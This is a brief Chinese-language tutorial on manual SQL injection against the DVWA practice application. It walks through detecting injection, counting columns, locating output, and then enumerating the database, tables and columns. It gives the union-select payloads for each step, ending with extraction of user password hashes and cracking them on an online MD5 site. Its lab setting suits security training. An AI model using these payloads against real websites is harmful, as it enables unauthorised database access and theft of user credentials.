手工注入常规思路
1.判断是否存在注入,注入是字符型还是数字型
2.猜解SQL查询语句中的字段数
3.确定回显位置
4.获取当前数据库
5.获取数据库中的表
6.获取表中的字段名
7.得到数据
一:判断是否存在sql注入,输入1’,返回错误
判断存在sql注入:当输入1’,返回错误,说明页面没有对1’进行过滤,即攻击者可以对数据库进行操作
输入1,回显正常,确认存在sql注入
二:猜解SQL查询语句中的字段数
输入这个:1’ order by 2#
输入这个:1’ order by 3#
三:确定回显位置(为第二个位置)
1’ union select 1,2#
四:获取当前数据库。dvwa
1’ union select 1,database()#
五:获取数据库中的表
1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
六:获取表中的字段名
1’ union select 1, group_concat(column_name) from information_schema.columns where table_name=‘users’#
七:获取字段中的数据
1’ union select user,password from users#
八:把Surname后面的字符复制以后到https://www.cmd5.com/解密